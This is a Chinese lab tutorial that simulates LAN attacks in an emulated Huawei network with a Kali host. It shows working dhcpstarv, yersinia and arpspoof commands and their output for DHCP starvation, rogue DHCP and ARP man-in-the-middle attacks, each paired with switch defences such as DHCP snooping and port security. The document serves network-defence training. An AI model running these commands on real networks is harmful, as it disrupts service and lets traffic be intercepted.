第1章 网络攻击模拟基础

1.1 饿死攻击:耗尽DHCP地址池

图片[1]-第1章 网络攻击模拟基础-大赛人网

图 1-1 DHCP攻击网络拓扑

1.R1配置DHCP服务器

dhcp enable
interface GigabitEthernet0/0/0
 ip address 192.168.100.1 255.255.255.240
 dhcp select interface
#查看地址池信息
display ip pool
  Pool-name      : GigabitEthernet0/0/0/0
  Pool-No        : 0
  Position       : Interface       Status           : Unlocked
  Gateway-0      : 192.168.100.1   
  Mask           : 255.255.255.240
  VPN instance   : --

  IP address Statistic
    Total       :13    
    Used        :0          Idle        :13    
Expired     :0          Conflict    :0          Disable   :0  
#查看地址池详细信息
display ip pool interface GigabitEthernet0/0/0/0 
 Pool-name      : GigabitEthernet0/0/0/0
  Pool-No        : 0
  Lease          : 1 Days 0 Hours 0 Minutes
  Domain-name    : -
  DNS-server0    : -               
  NBNS-server0   : -               
  Netbios-type   : -               
  Position       : Interface       Status           : Unlocked
  Gateway-0      : 192.168.100.1   
  Mask           : 255.255.255.240
  VPN instance   : --

         Start           End     Total  Used  Idle(Expired)  Conflict  Disable
   192.168.100.1  192.168.100.14    13     0         13(0)         0        0
#查看地址池所有详细信息
display ip pool interface GigabitEthernet0/0/0/0 all
 1   192.168.100.2                 -          -   Idle       
      2   192.168.100.3                 -          -   Idle       
      3   192.168.100.4                 -          -   Idle       
      4   192.168.100.5                 -          -   Idle       
      5   192.168.100.6                 -          -   Idle       
      6   192.168.100.7                 -          -   Idle       
      7   192.168.100.8                 -          -   Idle       
      8   192.168.100.9                 -          -   Idle       
      9  192.168.100.10                 -          -   Idle       
     10  192.168.100.11                 -          -   Idle       
     11  192.168.100.12                 -          -   Idle       
     12  192.168.100.13                 -          -   Idle       
     13  192.168.100.14                 -          -   Idle      

2.PC机设置自动获取IP地址

PC>ipconfig 
Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.100.14
Subnet mask.......................: 255.255.255.240
Gateway...........................: 192.168.100.1
Physical address..................: 54-89-98-E4-18-90
DNS server........................:

3.路由器查看地址池所有详细信息

display ip pool interface GigabitEthernet0/0/0/0 all
  1   192.168.100.2                 -          -   Idle       
      2   192.168.100.3                 -          -   Idle       
      3   192.168.100.4                 -          -   Idle       
      4   192.168.100.5                 -          -   Idle       
      5   192.168.100.6                 -          -   Idle       
      6   192.168.100.7                 -          -   Idle       
      7   192.168.100.8                 -          -   Idle       
      8   192.168.100.9                 -          -   Idle       
      9  192.168.100.10                 -          -   Idle       
     10  192.168.100.11                 -          -   Idle       
     11  192.168.100.12                 -          -   Idle       
     12  192.168.100.13                 -          -   Idle       
     13  192.168.100.14    5489-98e4-1890         36   Used       

4.kali服务器连接cloud设置

图片[2]-第1章 网络攻击模拟基础-大赛人网

5.SW1配置

#SW1关闭生成树
stp disable
#DHCP-SERVER服务器重新开启DHCP服务
interface GigabitEthernet0/0/0
undo dhcp select interface
dhcp select interface

6.kali发起攻击

#查看网络信息
┌──(root💀kali)-[~/Desktop]
└─# ip addr
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000                                                     
    link/ether 00:0c:29:e2:b3:f4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.11.100/24 brd 192.168.11.255 scope global eth0
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000                                                     
    link/ether 00:0c:29:e2:b3:fe brd ff:ff:ff:ff:ff:ff
    inet 192.168.8.137/24 brd 192.168.8.255 scope global dynamic eth1
       valid_lft 1160sec preferred_lft 1160sec
  
  #发起DHCP攻击                                                                           
┌──(root💀kali)-[~/Desktop]
└─# dhcpstarv -i eth0
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.14 for 00:16:36:65:6f:03 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.13 for 00:16:36:0c:1d:5d from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.12 for 00:16:36:06:7f:cb from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.11 for 00:16:36:25:b5:f5 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.10 for 00:16:36:c9:e4:20 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.9 for 00:16:36:37:b0:87 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.8 for 00:16:36:b5:46:df from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.7 for 00:16:36:d1:d9:23 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.6 for 00:16:36:2f:78:c4 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.5 for 00:16:36:dc:d5:4a from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.4 for 00:16:36:35:dd:bd from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.3 for 00:16:36:cb:83:5c from 192.168.100.1
16:34:45 07/20/23: no network mask option in DHCPOFFER
16:34:45 07/20/23: got address 192.168.100.2 for 00:16:36:6e:8c:97 from 192.168.100.1

7.DHCP服务器查看地址信息

display ip pool interface GigabitEthernet0/0/0/0 all
 1   192.168.100.2    0016-366e-8c97        106   Used       
      2   192.168.100.3    0016-36cb-835c        106   Used       
      3   192.168.100.4    0016-3635-ddbd        106   Used       
      4   192.168.100.5    0016-36dc-d54a        107   Used       
      5   192.168.100.6    0016-362f-78c4        107   Used       
      6   192.168.100.7    0016-36d1-d923        107   Used       
      7   192.168.100.8    0016-36b5-46df        107   Used       
      8   192.168.100.9    0016-3637-b087        107   Used       
      9  192.168.100.10    0016-36c9-e420        107   Used       
     10  192.168.100.11    0016-3625-b5f5        107   Used       
     11  192.168.100.12    0016-3606-7fcb        107   Used       
     12  192.168.100.13    0016-360c-1d5d        107   Used       
     13  192.168.100.14    0016-3665-6f03        119   Used   

1.2 DHCP server 仿冒攻击

1.仿冒攻击
┌──(root💀kali)-[~/Desktop]
└─# yersinia -G  
图片[3]-第1章 网络攻击模拟基础-大赛人网
图片[4]-第1章 网络攻击模拟基础-大赛人网

2.抓包

图片[5]-第1章 网络攻击模拟基础-大赛人网

3.PC机查看地址

PC>ipconfig 

Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.11.200
Subnet mask.......................: 255.255.255.0
Gateway...........................: 192.168.11.100
Physical address..................: 54-89-98-E4-18-90
DNS server........................: 192.168.11.100

1.3 DHCP 攻击防范

1.DHCP server 仿冒攻击防范
1)重新恢复DHCP服务
interface GigabitEthernet0/0/0
[DHCP-SERVER-GigabitEthernet0/0/0]undo  dhcp select interface
Warning: There are IP addresses allocated in the pool. Are you sure to delete the pool?[Y/N]:y
[DHCP-SERVER-GigabitEthernet0/0/0] dhcp select interface

display ip pool interface GigabitEthernet0/0/0/0 all

 1   192.168.100.2                 -          -   Idle       
      2   192.168.100.3                 -          -   Idle       
      3   192.168.100.4                 -          -   Idle       
      4   192.168.100.5                 -          -   Idle       
      5   192.168.100.6                 -          -   Idle       
      6   192.168.100.7                 -          -   Idle       
      7   192.168.100.8                 -          -   Idle       
      8   192.168.100.9                 -          -   Idle       
      9  192.168.100.10                 -          -   Idle       
     10  192.168.100.11                 -          -   Idle       
     11  192.168.100.12                 -          -   Idle       
     12  192.168.100.13                 -          -   Idle       
     13  192.168.100.14                 -          -   Idle       
2)SW1开启dhcp snooping及信任端口
dhcp enable
dhcp snooping enable
vlan 1
dhcp snooping enable
#添加信任端口
dhcp snooping trusted interface GigabitEthernet 0/0/2

3)PC机查看地址信息
PC>ipconfig 

Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.100.14
Subnet mask.......................: 255.255.255.240
Gateway...........................: 192.168.100.1
Physical address..................: 54-89-98-E4-18-90


2.DHCP server 饿死攻击防范
1)SW1开启DHCP snooping +  dhcp snooping check chaddr 丢弃该消息
port-group 1
group-member GigabitEthernet 0/0/1 to GigabitEthernet 0/0/24
#开启dhcp snooping check功能
dhcp snooping check dhcp-chaddr enable
#进入G0/0/3查看
interface GigabitEthernet0/0/3
 dhcp snooping check dhcp-chaddr enable

2)发起dhcpstarv饿死攻击
图片[6]-第1章 网络攻击模拟基础-大赛人网

3)查看DHCP信息

图片[7]-第1章 网络攻击模拟基础-大赛人网
MAC地址和chaddr不同,则认为是攻击,开启DHCP snooping +  dhcp snooping check chaddr 丢弃该消息

4)PC机查看地址信息
PC>ipconfig 

Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.100.14
Subnet mask.......................: 255.255.255.240
Gateway...........................: 192.168.100.1
Physical address..................: 54-89-98-E4-18-90
DNS server........................:


3.发起yersinia 攻击
1)Yersinia DHCP DOS攻击
图片[8]-第1章 网络攻击模拟基础-大赛人网
图片[9]-第1章 网络攻击模拟基础-大赛人网
图片[10]-第1章 网络攻击模拟基础-大赛人网
Yersinia DHCP DOS攻击,MAC地址和chaddr地址相同,Yersinia DHCP DOS攻击 防范 无法通过CHECK-CHADDR实现

2)通过端口安全方式实现防范
Yersinia伪造,SOURCE-MAC和CHADDR全部伪造,Yersinia攻击会让交换机端口学习到大量MAC地址。在一个交换机的一个access接口下,只允许一个MAC学习。如果学习到多个,那么则对端口进行惩罚,惩罚方式-关闭接口shutdown。
port-group 1
#开启安全
port-security enable
#设置最大MAC地址数量
port-security max-mac-num 1
#开启安全保护(关闭)
port-security protect-action shutdown
#关闭保护需要重新开启端口
interface GigabitEthernet 0/0/3
undo shutdown

1.4 ARP攻击防范

图片[11]-第1章 网络攻击模拟基础-大赛人网
1.ARP攻击
1)R2配置
interface GigabitEthernet0/0/0
ip address 192.168.11.101 24
ip route-static 0.0.0.0 0.0.0.0 192.168.11.199
ping 192.168.11.199
     Reply from 192.168.11.199: bytes=56 Sequence=1 ttl=255 time=140 ms
  
display arp
192.168.11.101  5489-98e6-7f25            I -         GE0/0/0
192.168.11.199  5489-9879-755b  20        D-0         GE0/0/0

2)R3配置
interface GigabitEthernet0/0/0
ip address 192.168.11.199 24
dis arp
192.168.11.199  5489-9879-755b            I -         GE0/0/0
192.168.11.101  5489-98e6-7f25  20        D-0         GE0/0/0

3)SW1关闭端口安全
interface GigabitEthernet 0/0/3
undo  port-security enable

4)KALI发起dsniff攻击
┌──(root💀kali)-[~/Desktop]
└─# ip add     
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000                                                     
    link/ether 00:0c:29:e2:b3:f4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.11.100/24 brd 192.168.11.255 scope global eth0
       valid_lft forever preferred_lft forever


┌──(root💀kali)-[~/Desktop]
└─# arpspoof                                            
Version: 2.4
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
                                                                             
┌──(root💀kali)-[~/Desktop]
└─# arpspoof -i eth0 -t 192.168.11.101 -r 192.168.11.199               130 ⨯
0:c:29:e2:b3:f4 54:89:98:e6:7f:25 0806 42: arp reply 192.168.11.199 is-at 0:c:29:e2:b3:f4
0:c:29:e2:b3:f4 54:89:98:79:75:5b 0806 42: arp reply 192.168.11.101 is-at 0:c:29:e2:b3:f4

4)R2查看错误的ARP表
dis arp
192.168.11.101  5489-98e6-7f25            I -         GE0/0/0
192.168.11.199  000c-29e2-b3f4  20        D-0         GE0/0/0
192.168.11.100  000c-29e2-b3f4  15        D-0         GE0/0/0

5)R3查看错误的ARP表
192.168.11.199  5489-9879-755b            I -         GE0/0/0
192.168.11.101  000c-29e2-b3f4  20        D-0         GE0/0/0
192.168.11.100  000c-29e2-b3f4  15        D-0         GE0/0/0

2.RP中间人攻击防范 – 防范技术DHCP-SNOOPING
1)DHCP-SNOOPING开启之后-交换机创建DHCP-SNOOPING表五元素表(包含IP、MAC、VLAN接口、interface-DHCP、租期)
display dhcp snooping user-bind all
192.168.100.14   5489-98e4-1890  1   /--  /--    GE0/0/1        2023.07.21-12:35

2)开启ARP ANTI-ATTACK命令
#VLAN下开启
vlan 1
arp anti-attack check user-bind enable 
#接口下开启
interface GigabitEthernet 0/0/3
arp anti-attack check user-bind enable
© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

    请登录后查看评论内容